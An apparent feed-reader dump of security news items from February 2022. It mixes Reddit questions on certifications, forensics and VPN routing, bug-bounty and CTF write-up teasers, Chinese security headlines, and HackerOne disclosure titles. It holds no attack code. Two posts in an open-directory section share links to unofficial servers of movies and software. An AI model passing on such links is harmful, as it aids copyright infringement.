    i am a new penetration tester and i want to gather some certifications for me to be able to further my career. however i have observed that cybersecurity certifications are particularly expensive, so like the Certified Ethical Hacker (CEH) certifcation costs 1200 USD which is a lot since i am planning to pay them by myself.. ​ i recently saw elearnsecurity , particularly the eJPT and it only costs 200 USD which i think is great since it shows that i have some real world and hands on capabilities as a penetration tester.. so are there any other certifications like the eJPT which is affordable and credible? preferrably around the same or better if lower price than the eJPT ​ thank you submitted by /u/darkalimdor18 [link] [comments]  ( 3 min )
    Book recommendations
    Looking for some good books to study up on foundational Network Concepts and maybe some stuff that could help me prepare for Network+ submitted by /u/Wintermane45 [link] [comments]
  • Open

    What makes a great incident response engineer?
    submitted by /u/Real_Score_5035 [link] [comments]  ( 1 min )
    QUESTION: confiscated phone asks to update whatsapp
    Good afternoon, My local department wants to manually check whatsapp messages on a phone. The phone has been in flight mode since we've confiscated it. We ran into the issue that when we want to launch whatsapp it asks to update the whatsapp software. If we want to do this this means that we'll have to hook it up to our wifi network. Does this mean that if the suspect has deleted his messages through whatsapp.web / other phone that this will also be synched with the whatsapp on the phone? I also believe that whatsapp is linked to a phone number. So it would rather be impossible for the suspect to get on his whatsapp without his sim-card(this is in our possesion as well). We also use the UFED cellebrite, but whatsapp conversations don't always come through. So what are our options to be able to get back into whatsapp without loss of data? ​ Thanks! submitted by /u/Tniso [link] [comments]  ( 1 min )
  • Open

    Lodestar Joins the Consensus Layer Bug Bounty
    ChainSafe is happy to announce that we’ve been added to the Ethereum Foundation’s consensus layer bug bounty program for Lodestar, our… Continue reading on ChainSafe »  ( 1 min )
    File Inclusion Vulnerabilities - Cyber Sapiens Internship Task-19
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Insecure Direct Object Reference- Cyber Sapiens Internship Task-18
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    No Rate Limiting Vulnerability & Bypasses - Cyber Sapiens Internship Task-17
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 2 min )
    Directory Listing Vulnerability - Cyber Sapiens Internship Task-16
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 3 min )
    Bug Report; Bypassing Weekly Limits In Basic (Free) LinkedIn Account
    Publishing my first Security Vulnerability report for LinkedIn.Below is the report that I have submitted to LinkedIn Information Security… Continue reading on Medium »  ( 2 min )
    Hacked Dutch Government Website. All I got was this l̶o̶u̶s̶y̶ cool T-Shirt.
    They are right. Persistence is the key ! Continue reading on Medium »  ( 1 min )
    What is CSRF Attack ?
    Cross-Site Request Forgery (CSRF) is an attack that forces authenticated users to submit a request to a Web application against which they… Continue reading on Medium »  ( 2 min )
    My First Reflected XSS Bug Bounty — Google Dork — $xxx
    Today I will share a Reflected XSS vulnerability that was reported by me and i found this with google dorks… Continue reading on InfoSec Write-ups »  ( 3 min )
    ImmuneFi y Octopus Network Lanzan Jugoso Bug Bounty
    Octopus Network 🐙 Continue reading on Medium »  ( 3 min )
  • Open

    ‘Ice phishing’ on the blockchain
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-02-16 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Machine Learning Enrichment in your Data Asset Production Flow
    How discursus tackled the challenge of introducing ML enrichments in data asset production flows, using Dagster, dbt and Novacene AI. Continue reading on discursus.io »  ( 5 min )
    Power of Reverse Image Search — OSINT Challenge 16
    On Dec 22, 2021, Quiztime (contributor @twone2) shared a new OSINT quiz with us. Continue reading on Medium »  ( 1 min )
  • Open

    如何做好安全研发人才招聘之如何招人
    人是很顽固的一种生物,大部分人成年以后很难改变固有的思维定势。从这个角度来讲,选拔的重要性大于培养。
    “大规模混合战争”阴影下的乌克兰
    “开战日”,cctv13 播报中没有出现大规模战争的血腥画面,俄乌双方似乎都陷入了静默的状态。  ( 1 min )
    FreeBuf早报 | 乌军事机构和银行受网络攻击;新加坡将推出强有力的反诈骗措施
    从2022年2月15日下午开始,乌克兰国防部和武装部队以及国有银行遭到DDoS攻击  ( 1 min )
    线上+线下全覆盖!CIS 2021大会·春日版「新玩法」抢先揭秘
    各位FreeBuf的新老朋友大家好,CIS 2021议题来啦~  ( 1 min )
    啪啪打脸,国际互联网协会数据泄露
    作为互联网世界相关标准的制定、推广的机构,以推动互联网的发展为己任,却也因为网络安全漏洞出现信息被泄露事件,让人颇感尴尬。  ( 1 min )
    Yak基础插件案例——CDN检测
    内容分发网络(CDN)是指一种透过互联网互相连接的电脑网络系统,本文从CDN以及CDN的配置先说起,详解Yak基础插件案例。  ( 3 min )
    新型勒索病毒Coffee潜伏期高达百日,360解密大师独家支持解密
    近日,360安全大脑监测发现一种具有蠕虫性质的新型勒索病毒Coffee存在大范围传播的风险。
    调查显示,零信任战略受到 CSO 好评
    实施零信任是作为降低网络风险的有效方式。  ( 1 min )
    Swissport遭受BlackCat勒索攻击
    瑞士Swissport空港服务公司遭勒索软件攻击,一度导致航班延误和服务中断。
    乌克兰银行和军事机构遭受了DDoS攻击
    昨日下午,乌克兰国防部和武装部队,以及该国的两家国有银行受到了分布式拒绝服务(DDoS)的攻击。
    跳槽被公司无死角监控?这个盖子终于捂不住了
    伴随着国内相关法律法规的落地和民众隐私保护意识的觉醒,这个盖子终于捂不住了。当盖子被掀开时,我们需要重新审视这个问题。  ( 1 min )
  • Open

    The Ultimate Secret To Red Team Engagements
    The key to a successful engagement is well-coordinated planning and communication through all parties involved. This blog post would focus… Continue reading on Medium »  ( 1 min )
    Here is how you can become an ethical hacker
    Ethical hackers are experienced professionals who find exploitable bugs and report to increase the cybersecurity posture of an… Continue reading on Medium »  ( 1 min )
  • Open

    Windows Privilege Escalation: SpoolFool
    Introduction Oliver Lyak posted a write-up about a Windows Privilege Escalation vulnerability that persisted in Windows systems even after patching of previous vulnerabilities in Print The post Windows Privilege Escalation: SpoolFool appeared first on Hacking Articles.  ( 8 min )
  • Open

    My First Reflected XSS Bug Bounty — Google Dork — $xxx
    Today I will share a Reflected XSS vulnerability that was reported by me and i found this with google dorks… Continue reading on InfoSec Write-ups »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on…  ( 6 min )
    SHODAN is the true Internet search engine — Here’s why?
    Unlike Google, which scans only for ports 80 & 443, Shodan is the true… Continue reading on InfoSec Write-ups »  ( 3 min )
    PRACTICAL MALWARE ANALYSIS LAB PART — I
    This lab uses the files Lab01–01.exe and Lab01–01.dll. Use the tools and tech- niques described in the chapter to gain information about…  ( 5 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence…  ( 9 min )
    TryHackMe: Team
    Walk-Through  ( 4 min )
  • Open

    My First Reflected XSS Bug Bounty — Google Dork — $xxx
    Today I will share a Reflected XSS vulnerability that was reported by me and i found this with google dorks… Continue reading on InfoSec Write-ups »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on…  ( 6 min )
    SHODAN is the true Internet search engine — Here’s why?
    Unlike Google, which scans only for ports 80 & 443, Shodan is the true… Continue reading on InfoSec Write-ups »  ( 3 min )
    PRACTICAL MALWARE ANALYSIS LAB PART — I
    This lab uses the files Lab01–01.exe and Lab01–01.dll. Use the tools and tech- niques described in the chapter to gain information about…  ( 5 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence…  ( 9 min )
    TryHackMe: Team
    Walk-Through  ( 4 min )
  • Open

    Almost every publicly available CVE PoC
    Article URL: https://github.com/trickest/cve Comments URL: https://news.ycombinator.com/item?id=30357373 Points: 104 # Comments: 14  ( 3 min )
  • Open

    Termux Apps Vulnerability Disclosures
    Article URL: https://termux.github.io/general/2022/02/15/termux-apps-vulnerability-disclosures.html Comments URL: https://news.ycombinator.com/item?id=30357335 Points: 2 # Comments: 0  ( 9 min )
  • Open

    How can I download a React site to edit it locally?
    I have done this before with wget and had no problems, however, I am trying to download this react app and am having a very hard time. For some reason it is only downloading the index.html page and when I click on another tab I get "GET /example" Error (404): "Not found" However, when I run wget on the /example page and grab example.html then it works, but this is not feasible for every page that I need to run. I am calling: wget --random-wait -r -p -e robots=off -U mozilla https://example.com What am I doing wrong / is there a better tool to do this? The site is hosted on Vercel and uses the Next.js framework Any help is much appreciated :) submitted by /u/tokentrader [link] [comments]  ( 2 min )

  • Open

    Why would a civilian private network be using an public IP range internally for device assignments (military netblock at that)?
    I was visiting a popular big box store today and was looking at one of their WiFi printers and saw this: https://imgur.com/a/fTZ1Emc Any idea why they are using a public ip range instead of something internal like 192, 172, 10 etc for IP assignments? The netblock according to ARIN belongs to the DoD (https://whois.domaintools.com/7.117.1.1) Just to make sure it wasn't a fluke, I also looked at another device on their network which also had a 7.117 IP. I just thought it was very strange. Any ideas? submitted by /u/LyleTillman [link] [comments]  ( 2 min )
    What's the Biggest Turn Off in Regards to Offensive Frameworks?
    I'm referring to software such is Metasploit, CobaltStrike, Armitage, Ramcos, etc.... submitted by /u/Blagojee [link] [comments]  ( 1 min )
    Burp Suite certificate question
    I was wondering if anyone has recently done their burp suite practioner exam cert recently and how relatable it is to their practice test? Is burp suite pro REALLY necessary for the test? Just curious because it's for work and I don't want to pay for pro to not use it. My work has boxes setup with pro so my personal liscense won't be utilized except for the test. submitted by /u/phishingsudo [link] [comments]  ( 1 min )
    Is it possible to route ALL traffic from an idevice through a VPN?
    I'm somewhat new to idevice admin, so please excuse any ignorance. Is it possible to route literally ALL packets from an iPhone through a VPN? We're trying to get some stuff set up and we implemented a VPN by way of a user-installable app. Unfortunately it seems that on iOS there are a lot of connections that bypass this. For example when first connected to a wifi network the iPhone spams a flurry of connections to Apple's servers which don't go through the VPN. I've confirmed this by creating an "evil" wifi network that supports ipv4 only and blocks any connections to the 17.x.x.x range (which is wholly owned and operated by Apple), and even with the VPN active the logs show hundreds of connection attempts persistently. If I also block all Apple domains then half the stuff on the phone no longer works. App-based connections are routed correctly (Safari, etc), but the phone completely ignores the VPN for both DNS lookups and the connections themselves when it comes to system stuff and I'm not sure why. From my research it seems that maybe we need to ditch the app idea and instead implement an "always on" VPN by way of a mobileconfig file. This appears to require the iPhones to be supervised through MDM, which isn't a problem. I've taken a test phone, wiped and supervised it, but I'm having trouble figuring out how to create a mobileconfig that does what we want. Before I burn too many hours messing with this I'm wondering if anyone can help with the following two questions: Will an "always on" VPN on an iPhone actually route ALL packets through the VPN (including the system level phone-home initialization stuff, DNS lookups, ntp, etc) or is this not even the right approach? Assuming (1) is the correct approach, can someone point me to an example mobileconfig file that implements this so I can look at the structure and have a better idea of what I'm doing? submitted by /u/sneakertech [link] [comments]  ( 2 min )
    What are my options for an encrypted bootable flash drive containing 2 Linux OS, selection of which would be done by password alone at the bootloader / pre-boot stage.
    I want an encrypted bootable flash drive which contains 2 LINUX OS. The existence of either OS should be impossible to determine without a password. The flash drive should boot to a BOOTLOADER password prompt. Entering a wrong password should do nothing Entering password A should boot OS A Entering password B should boot OS B After boot of A, it should not be possible to prove the existence of B After boot of B, it should not be possible to prove the existence of A (i.e. if, by booting one of the OS, it is then possible to see that half the flash drive is 'unallocated' then we have probably failed our task) You're already thinking 'plausible deniability' is the phrase im looking for. Yes you're right - thats exactly what I want. I want what Veracrypt can do, but I want it for Linux, not Windows. Is it possible? I've looked at LUKS, but I dont see that it can do what I want. Thanks for any suggestions. submitted by /u/boli99 [link] [comments]  ( 1 min )
    Is law enforcement/fed/military experience pretty much mandatory to become good at DFIR?
    We can say you can self study, learn all the material, join a SOC and pray for a promotion, get certifications, etc. I don't see a whole ton of jobs open for DFIR without explicit mention of tools, processes, and experience that one would have to accumulate in one of those sectors that isn't gated by 5-10 years of experience doing it. Additionally, it seems to me that most of the people who are pumping out books and learning material come from some kind of government background where they did incident response. Almost all hiring managers I've met have significant LE experience behind them. What I see much more of is people without this govt background going into pentesting, policy work, etc. Are you pretty much screwed for getting into DFIR at a large corp without a three letter agency or military on the resume? submitted by /u/Different-Area-3053 [link] [comments]  ( 2 min )
    Forensics Toolkits Recommendations? GCP Linux VM may have been compromised and use for crypto mining :/
    Hey y'all! I have a VM that was flagged by Google for potential compromise and being used for crypto mining (the CPU was flat out 50%, continuously for last several days). I immediately took down the machine, snapshotted and imaged it; rotated all security keys for GCP account. I don't think there is any nefarious activity and the compromise was likely to this one machine (or maybe I think that). I would like to find a tool that can show me last logins, various logs, any suspicious software etc. so that I can start digging or escalate. What tools, if any, would you recommend? I have been running individual commands like last, utmpdump, scrubbing logs manually but I figured there has to be a tool to make this easy. submitted by /u/sidgup [link] [comments]  ( 2 min )
  • Open

    ImmuneFi Bug Bounty Launched!
    Octopus Network is a brand new multichain network born to serve application-specific blockchains, aka appchains. Octopus Network provides… Continue reading on Octopus Network »  ( 2 min )
    Yet another enumeration of subdomains with statistics
    Or how to collect million of bugbounty subdomains in order to make a few wordlists. Continue reading on Medium »  ( 1 min )
    Do you want to start your career in Cyber Security — Read This .
    Cyber Security - Learn hack Secure. Continue reading on Medium »  ( 3 min )
    100 Days of Hacking — Day 10
    What’s up guys it’s the 10th day of #100DaysofHacking. 10% of the goal is achieved let’s go through today’s objectives and report Continue reading on Medium »  ( 2 min )
    Bug Bounty Stress aka Burnout: do and don’t
    Don’t stress yourself too much! Continue reading on Medium »  ( 3 min )
    HigherLogic RCE In _VSTATE .NET
    Remote code execution (RCE) is a class of software security flaws/vulnerabilities. RCE vulnerabilities will allow a malicious actor to… Continue reading on Medium »  ( 1 min )
    PORTSWIGGER WEB SECURITY - FILE UPLOAD LAB ÇÖZÜMLERİ
    File Upload (Dosya Yükleme), kullanıcının bir web sunucusuna dosya yüklemesine denir. Web sayfaları kullanıcıdan dosya yüklemesi için… Continue reading on Medium »  ( 10 min )
    Jax.Money testing: rewards up to $20,000 and more!
    by Ramyata Rao, Digital Marketing Manager at Jax.Network Continue reading on Jax.Network Blog »  ( 4 min )
    ​​How Did I Start Doing Bug Bounty?
    Since school, I have been reading Hacker (the Russian offensive security magazine) when I had the opportunity to buy it (then it was still… Continue reading on Medium »  ( 2 min )
    Bug Bounty: Low Hanging Fruit
    Low-hanging fruit are bugs that are very easy to find. I would divide them into 2 more types. Continue reading on Medium »  ( 1 min )
  • Open

    A technique to semi-automatically discover new vulnerabilities in WordPress plugins
    submitted by /u/kazetkazet [link] [comments]
    GoIP-1 GSM gateway could be harnessed for phone fraud by hackers
    submitted by /u/ValtteriLe [link] [comments]
    Dependabot alternative for Clojure
    submitted by /u/mthbernardes [link] [comments]
    CVE-2021-44521 – Exploiting Apache Cassandra User-Defined Functions for Remote Code Execution
    submitted by /u/SRMish3 [link] [comments]
    A CLI SAST (Static application security testing) tool which was built with the intent of finding vulnerable Clojure code via rules that use a simple pattern language.
    submitted by /u/mthbernardes [link] [comments]  ( 1 min )
    merOS-virt - Build and Interact with a Set of Virtual Machines.
    submitted by /u/AranAilbhe [link] [comments]  ( 2 min )
    Advisory: Western Digital My Cloud Pro Series PR4100 RCE
    submitted by /u/g_e_r_h_a_r_d [link] [comments]  ( 1 min )
  • Open

    Horizontall HackTheBox Walkthrough
    Introduction Horizontall is an “easy” rated CTF Linux box on Hack The Box platform. The box covers initial compromise by exploiting Strapi RCE vulnerability and The post Horizontall HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Google Rewards Indian Techie With $8.7M in vulnerability rewards
    Article URL: https://www.indiatimes.com/technology/news/google-thanks-indian-researcher-android-chrome-bug-561975.html Comments URL: https://news.ycombinator.com/item?id=30349459 Points: 9 # Comments: 1  ( 2 min )
  • Open

    An OSINT Path — In TryHackMe
    Hello Friends, Continue reading on Medium »  ( 1 min )
    Honeypot — Seoul, South Korea (Threat Analysis)
    안녕하세요! Continue reading on Medium »  ( 5 min )
    TryHackMe Sakura Room CTF Write-Up
    My wired, unexplainable urge to get OSINT Dojo's Student Rank Badge has led me to this CTF, and now that I'm here, I realize that I can… Continue reading on Medium »  ( 4 min )
    Hacktoria: Geolocation 13 (Walkthrough)
    Hacktoria: Geolocation 13 (Walkthrough) Continue reading on Medium »  ( 1 min )
  • Open

    SecWiki News 2022-02-15 Review
    终极Java反序列化Payload缩小技术 by ourren 求解网络安全问题的可解释机器学习 by ourren 从一例 Pegasus 误报说开去 by Avenger 绕过污点分析的一些思考 by ourren 2021网络金融黑产研究报告 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Question: Different imaging tools for acquisition
    I'm very new to computer forensics. Right now I'm exploring different data acquisition tools. I tried to image a usb device using FTK Imager (on a Windows system) and dd from the SIFT workstation (linux). I noticed that: 1. These two imaging tools provide image data of different sizes. 2. FTK automatically verifies the hash of the device and the image - both hashes were the same. 3. For the dd image, I verified it by myself and they were the same. I have few questions: 1. Why is the hash of the same device different on FTK (running on windows) and when checking on the SIFT Workstation (linux) ? 2. If different tools provide different images, do analysts use a combination of multiple tools? 3. I read about write blockers, I did not use one while imaging, could the difference be because of this? I'd be grateful if you could help me understand more about this process by answering my questions or sharing more resources that I could use. Thanks! submitted by /u/nybble04 [link] [comments]  ( 4 min )
    Overview of autopsy data artifacts, analysis results, and reporting. Part 2 of the autopsy series. nmap usage investigation as a case study.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
    iCloud forensics
    Anyone has any experience recovering permanently deleted iCloud data using Cellebrite? Or any other forensic tools ? submitted by /u/Techn0prince [link] [comments]  ( 2 min )
    ENCE Certification
    Hi all, My Ence cert is up in April 22 and I would like to maintain accreditation. Unfortunately my role has a focus towards E-Discovery and not so much digital forensics so I may struggle to get aid from my employer re training and financing. Anyone have experience renewing? Are there any requirements for renewal? As I am likely having to purchase the training myself I don't want the training to be too expensive (particularly as it's not a skill I use day to day). I would likely benefit the most from Cellebrite or AXIOM training. TIA submitted by /u/Genzlol [link] [comments]  ( 1 min )
  • Open

    专访极盾技术总监郑冬东:大火的XDR能给企业带来什么?
    XDR安全技术的魅力究竟在哪里,被众人寄予厚望的XDR技术能否解决哪些难题?  ( 1 min )
    FreeBuf早报 | 美国关基组织又遭勒索软件入侵;欧洲央行要求各银行加强网络防御
    在乌克兰危机加剧之际,欧洲央行警告各银行可能受到与俄罗斯有关的网络攻击,要求各银行加强网络防御。  ( 1 min )
    2021 网络金融黑产研究报告
    随着新一轮金融科技的发展与产业的变革,金融行业加快了数字化转型的步伐,灵活与便捷的金融业务模式在为用户提供更加优质的金融服务的同时,也面临着来自黑产不断演变迭代的各类新型攻击威胁。  ( 1 min )
    美国一公司暴露了 700 万用户数据
    一个存在安全风险的Amazon S3存储桶中,包含约700万人的个人数据信息。  ( 1 min )
    体育品牌美津浓遭勒索软件攻击致订单延期
    运动设备与服装品牌美津浓(Mizuno)在2月4日遭受了一次勒索软件攻击。这次攻击严重地导致公司业务中断。
    欧洲最大汽车经销商遭遇勒索攻击、谷歌紧急修复零日漏洞|2月15日全球网络安全热点
    欧洲最大的汽车经销商之一埃米尔·弗雷(Emil Frey)上个月遭到勒索软件攻击,这家瑞士公司于2月1日出现在Hive勒索软件的受害者名单上。  ( 1 min )
    关于CIS 2021 Spring·春日版活动形式调整的公告
    结合线下与线上新玩法,CIS 2021春日版与您不见不散。  ( 1 min )
    《网络安全审查办法》今日施行,百万信息级平台国外上市需审查
    新修订的《网络安全审查办法》以关键信息基础设施的供应链安全为核心,重点加强对数据安全的关注和规范。
    谷歌Chrome紧急修复了在攻击中被利用的零日漏洞
    Google发布了适用于Windows、Mac和Linux的Chrome,以修复威胁参与者在攻击中使用的高严重性零日漏洞。
    CISA 在其已知利用漏洞目录中新增15个新漏洞
    美国网络安全与基础设施安全局(CISA)在“已知被利用漏洞目录”中又增加了15个漏洞。  ( 1 min )
    FBI:BlackByte 勒索软件已入侵美国关键基础设施
    美国联邦调查局与美国特勤局发布联合网络安全咨询公告,显示BlackByte 勒索软件组织在过去3个月中入侵了至少3 个美国关键基础设施。  ( 1 min )
  • Open

    Cross-origin resource sharing
    Showmax disclosed a bug submitted by qualin: https://hackerone.com/reports/1478449 - Bounty: $50
    When sharing a Deck card in conversation the metaData can be manipulated to open arbitrary URL
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1358977 - Bounty: $100
    Ability to Disable the Login Attempt of any Shopify Owner for 24 hrs (Zero_Click)
    Shopify disclosed a bug submitted by saurabhsankhwar3: https://hackerone.com/reports/1406495 - Bounty: $900
  • Open

    Pretty decent collection of movies that is well organized (as well as software and other stuff)
    ​ http://162.12.215.254/Data/ I was looking for the movies and the English ones are mostly good quality, and without any burned in subs or forced dual languages. ​ Sorry if repost. Found searching, "English" in search box with "video" in ['filegroup or ext'] box on eyedex.org submitted by /u/Rest-in-Peep [link] [comments]  ( 1 min )
    First contribution
    https://who.4386.ltd/Doctor/ I think all marvel files are in 4K. there are more movies in the "movies for" tab. https://who.4386.ltd/Heng/ P.S. the site is in chinese so let chrome translate the page first. submitted by /u/CompetitiveMango12 [link] [comments]  ( 1 min )
  • Open

    TryHackme Principles of Security
    Hello, Amazing hackers in this blog you are gonna see about principles of security.  ( 3 min )
    Pentesting Fundamentals Tryhackme
    Hi, Amazing Hackers today I come up with another interesting topic on Tryhackme which is Pentesting Fundamental.  ( 3 min )
    Hackeando Wordle
    Cómo adivinar la palabra del día a través de ingeniería inversa Continue reading on InfoSec Write-ups »  ( 4 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways…  ( 4 min )
    How I was able to take over any account via the Password Reset Functionality.
    Hey, This is my first writeup and I will talk about an account takeover that I found in May on a vulnerability disclosure program. Let’s…  ( 4 min )
  • Open

    TryHackme Principles of Security
    Hello, Amazing hackers in this blog you are gonna see about principles of security.  ( 3 min )
    Pentesting Fundamentals Tryhackme
    Hi, Amazing Hackers today I come up with another interesting topic on Tryhackme which is Pentesting Fundamental.  ( 3 min )
    Hackeando Wordle
    Cómo adivinar la palabra del día a través de ingeniería inversa Continue reading on InfoSec Write-ups »  ( 4 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways…  ( 4 min )
    How I was able to take over any account via the Password Reset Functionality.
    Hey, This is my first writeup and I will talk about an account takeover that I found in May on a vulnerability disclosure program. Let’s…  ( 4 min )

  • Open

    “That SweetPot of Data Net-tar” My first Honey Pot Walkthrough Part 3
    Part 1 Continue reading on Medium »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on… Continue reading on InfoSec Write-ups »  ( 5 min )
    Walkthrough — Hacktoria: Geolocation 11
    Once again I am back with a walkthrough to a GEOINT challenge. I will be explaining how to solve Geolocation 11 practice test on… Continue reading on Medium »  ( 5 min )
    I Too Want a Key Collection — OSINT Challenge 15
    On Jan 20, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was simple. We had to figure out when the… Continue reading on Medium »  ( 2 min )
    How To Find Your Data In Web With Pimeyes And Other Reverse Tools
    Reverse Image Search is a web-based tool for finding identical and similar images related to the image you are looking for. Marketers can… Continue reading on Medium »  ( 2 min )
  • Open

    The Unobvious About XSS and HTML Encoding
    Many people know that before getting the value of a tag attribute, the browser decodes the HTML entities inside. Let’s say if you try to… Continue reading on Medium »  ( 2 min )
    How to get into bug bounties — A list of resources by The XSS Rat
    Hello friends, I’ve seen this question come by often so I’ve decided to try and group all the resources of myself that I have about… Continue reading on Medium »
    What is the Bug Bounty ?
    Often translated into French as “prime au bogue” or “bounty for the detected flaw”, the bug bounty appeared in the 90s within Netscape… Continue reading on CyberSecurity and GDPR compliance »  ( 3 min )
    Research on Clickjacking & Network Sniffing- Cyber Sapiens Internship Task-14
    Hello guys👋👋 ,Prajit here from the BUG XS Team and Cyber Sapiens United LLP Cybersecurity and Red Team Intern, in this I am regularly… Continue reading on Medium »  ( 4 min )
    How I did Full Account Takeover (FATO) using forgot password link?
    How I was able to takeover admin account by exploiting forgot password functionality. Continue reading on Medium »  ( 2 min )
    Broken Access Control Overview
    As I was going through web application vulnerabilities during my 100 days of hacking, I came across this interesting topic Broken Access… Continue reading on Medium »  ( 1 min )
    BigQuery SQL Injection Cheat Sheet
    Last year, we (My researcher partner on this topic, Anil and me) and found a SQL injection vulnerability on a target at Synack which was… Continue reading on Medium »  ( 5 min )
    Bug Bounty — Bypassing Endpoints
    Hello there, let’s discuss on how to bypass endpoints. Before moving further, let’s take a quick glance about endpoints. Continue reading on Medium »  ( 2 min )
    My First Bounty and How I Got It
    Hello!! This is my first article, and I really hope you enjoy it! From June 2021, I began looking for issues on the websites. Continue reading on Medium »  ( 1 min )
    Javascript Security — Weak Type Bypass
    As you may know, Javascript is a weakly typed language. This features of the language can be used by hackers to bypass some checks within… Continue reading on Medium »  ( 1 min )
  • Open

    PrivateLoader to new Anubis Loader
    submitted by /u/sysopfb [link] [comments]
    Eliminating Dangling Elastic IP Takeovers with Ghostbuster
    submitted by /u/Mempodipper [link] [comments]
    Persistence – Notepad++ Plugins
    submitted by /u/netbiosX [link] [comments]  ( 1 min )
    Multiple vulnerabilities in Concrete CMS part2 (Privesc/SSRF/etc.)
    submitted by /u/adrian_rt [link] [comments]
    Dropping Files on a Domain Controller Using CVE-2021-43893
    submitted by /u/chicksdigthelongrun [link] [comments]
    MyloBot 2022 – Analysis of the new version of this evasive botnet that appears to just send extortion emails, but has the potential to do much more.
    submitted by /u/woja111 [link] [comments]  ( 1 min )
  • Open

    Arbitrary File Read at via filename parameter
    U.S. Dept Of Defense disclosed a bug submitted by shiar: https://hackerone.com/reports/1436223
    Broken Authentication
    U.S. Dept Of Defense disclosed a bug submitted by websecnl: https://hackerone.com/reports/409237
    IDOR
    U.S. Dept Of Defense disclosed a bug submitted by websecnl: https://hackerone.com/reports/389250
    CUI Labelled document out in the open
    U.S. Dept Of Defense disclosed a bug submitted by pll25: https://hackerone.com/reports/1436460
    EC2 subdomain takeover at http:///
    U.S. Dept Of Defense disclosed a bug submitted by dreyand72: https://hackerone.com/reports/1296366
    XSS trigger via HTML Iframe injection in ( https:// ) due to unfiltered HTML tags
    U.S. Dept Of Defense disclosed a bug submitted by rozerx00: https://hackerone.com/reports/1200770
    Reflected XSS at https:// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457277
    Reflected XSS at https:// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457546
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457493
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457444
    Reflected XSS at https:/// via "" parameter
    U.S. Dept Of Defense disclosed a bug submitted by pelegn: https://hackerone.com/reports/1457413
    (CORS) Cross-origin resource sharing misconfiguration on https://
    U.S. Dept Of Defense disclosed a bug submitted by fiveguyslover: https://hackerone.com/reports/995144
    default creds on https://
    U.S. Dept Of Defense disclosed a bug submitted by pirateducky: https://hackerone.com/reports/711662
    Unauthorized access to PII leads to MASS account Takeover
    U.S. Dept Of Defense disclosed a bug submitted by takester: https://hackerone.com/reports/1061736
    RXSS ON https://
    U.S. Dept Of Defense disclosed a bug submitted by iam_a_jinchuriki: https://hackerone.com/reports/1244145
    [CVE-2020-3452] Unauthenticated file read in Cisco ASA
    U.S. Dept Of Defense disclosed a bug submitted by ghostxsec: https://hackerone.com/reports/1415825
  • Open

    Preventing Replay Attacks
    Hey all, I'm going to be participating in an Attack/Defend CTF, and apparently one of the biggest vulnerabilities from previous competitions was replay attacks. Some more details: The server that is traditionally vulnerable to replay attacks is a headless Arch Linux box with limited disk space and no access to the Internet. I have superuser access this box via SSH; This server exists outside of our defensive LAN. Its sole responsibility is relaying commands to/from external entities. Think like a self-driving Tesla car being told what to do: "Turn left, turn left, turn left...". I should underscore that if an attacker replayed these commands, the car would inevitably crash. I've configured the IPtables on the box to: Drop invalid traffic; Accept existing traffic; Accept SSH from our administrative workstation; Accept commands from our client workstation; Forward traffic to the external entities; and Drop everything else. I want to inquire about any lightweight transport layer security options that I could implement to secure the bidirectional communication. I'm exploring IPsec/VPNs but I haven't found success. I just wanted to ask if I was missing anything simple here. Thank you for your time. submitted by /u/InfamousClyde [link] [comments]  ( 1 min )
    Alienvault OSSIM OTX Issue
